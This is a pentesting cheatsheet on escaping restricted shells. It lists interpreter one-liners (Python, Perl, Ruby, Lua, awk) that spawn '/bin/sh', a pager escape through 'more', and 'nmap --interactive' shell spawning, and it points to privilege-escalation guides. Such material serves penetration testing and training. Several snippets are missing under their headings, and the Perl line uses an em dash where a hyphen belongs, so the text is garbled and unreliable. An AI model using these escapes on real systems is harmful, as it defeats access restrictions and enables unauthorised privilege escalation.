Shell Escapes Cheatsheet

For when you forget or don't know how to take advantage of an eval() statement or spawn a shell in a specific language or escape some common programs.


Simple inline execution of commands, without semicolons:


Alternatively, using subprocess:

__import__('subprocess').run(["ls", "-l"])

Executing from shell, using complete import:

python -c 'import os; os.system("ls -l")'


From repl:

exec "/bin/sh";

From shell:

perl —e 'exec "/bin/sh";'


From repl:

exec "/bin/sh";

From shell:

ruby -e 'exec "/bin/sh"'


From repl:


From shell:

lua -e 'os.execute("/bin/sh")'


awk 'BEGIN {system("/bin/sh")}'

Escaping jails and restricted shells

Trying desperately to escape a restricted shell? Refer to the guide at

Escaping more

This can be anywhere from some script being printed as an MOTD before disconnecting you during an SSH session, to something more subtle like a paged viewer being run with elevated privileges.


Forcing systemctl, man, etc, to display with more

If you set the $SYSTEMD_PAGER or $PAGER env variable to more, when paged data is printed in a terminal, you can shrink your terminal to force more to show you only a portion of text rather than all text, letting you escape to shell with :!sh.

Spawning a shell with Nmap

You might be thinking, “What?” But in restricted shells, this can come in handy.

root@kali:~$ nmap --interactive
nmap> !sh

Nothing is working!!

Ran out of options? Maybe what you need isn't to escape a shell, but rather to escalate privileges. Try using Security Sift's tool, which does a lot of the tedious work for you and gives suggestions at the end of the script on what exploits might work.

Still stuck? If all else fails, check out g0tmi1k's blog post on privilege escalation.